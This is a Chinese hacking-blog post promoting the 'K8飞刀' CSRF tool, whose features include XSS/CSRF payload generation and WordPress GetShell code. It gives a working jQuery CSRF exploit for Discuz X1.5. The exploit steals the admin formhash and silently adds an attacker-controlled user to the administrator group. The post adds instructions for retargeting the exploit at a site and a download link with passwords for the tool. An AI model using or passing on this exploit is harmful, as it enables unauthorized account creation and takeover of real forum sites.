首页 » 软件工具 » 浏览内容
构造XSS-CSRF代码+Discuz添加用户EXP
工具: K8飞刀20141208 CSRF专版
编译: VS2012 C# (.NET Framework v2.0)
作者: K8拉登哥哥
简介:
最近在研究各类XSS,自然少不了要构造各种CSRF. 构造这玩意其实很简单
本地搭个环境 管理员登陆后对指定操作进行抓包,然后JS或FLASH来XXOO
本帖下方附上 Discuz X1.5 添加用户的CSRF的jQuery代码 供大家参考研究.
转换功能很简单,但非常实用,XSS流行的年代,这功能也将成为常用
不仅这样还省掉N多时间 post参数可能很多,手工构造不但费时
且遗漏其中一个参数都有可能导致CSRF失败. 我问你怕了吗?
图片:
功能:
[+]EncodeDecode Post提交代码(Flash/jQuery/Flash/Python/Perl/PHP) 20141208
[+]EncodeDecode Python Post参数 与 常规Post参数 互转(方便写EXP) 20141208
[+]EncodeDecode Flash Post参数 与 常规Post参数 互转(XSS-CSRF用) 20141208
[+]EncodeDecode jQuery Post参数 与 常规Post参数 互转(XSS-CSRF用) 20141206
[+]EncodeDecode 增加WordPress后台主题GetShell代码 + 右键菜单美化 20141203
[+]ExpDebug 增加右键复制 Web全部信息 Banner/IP/地址位置信息 20101202
[+]EncodeDecode 选中URL可右键使用 Firefox\Chrome\IE 浏览器打开 20141128
[+]DataOutput 正则截取数据(结果支持同时提取8个参数 灵活度更高) 20141128
Discuz X1.5 CSRF添加用户EXP
1 2 3 4 5 6 7 8 9 10 11 | <script src="http://www.exehack.net/jquery-1.4.1.min.js" type="text/javascript"></script> <script type="text/javascript"> $(function () { $.post("http://192.168.85.182/dz15/", function (data) { var getFormHash = data.split('action=logout&formhash=')[1].split('">')[0]; $.post("http://192.168.85.182/dz15/admin.php?action=members&operation=add", { formhash: getFormHash,scrolltop: "",anchor: "",newusername: "exehack",newpassword: "exehack",newemail: "exehack@xx.com",newgroupid: "10",emailnotify: "0",addsubmit: "%CC%E1%BD%BB"}); }); }); </script> |
使用方法:
1.将以上的www.exehack.net地址的jquery-1.4.1.min.js替换为自己搭建的地址
2.将192.168.85.182/dz15/替换为需要测试的目标站点的地址
3将exehack exehack exehack@xx.com 修改为自己需要添加的帐号密码邮箱
ps:如果还是有不懂的地方可以在小残博客的文章下方留言告诉我,看到会第一时间回答的
下载地址:http://pan.baidu.com/s/1kTihHRL
提取密码:4sv8
解压密码:www.exehack.net
本站部分文章来自网络,版权归原作者,转载请保留原作者署名!
本文来自小残博客>>文章地址:
评论 共 0 条 (RSS 2.0) 发表 评论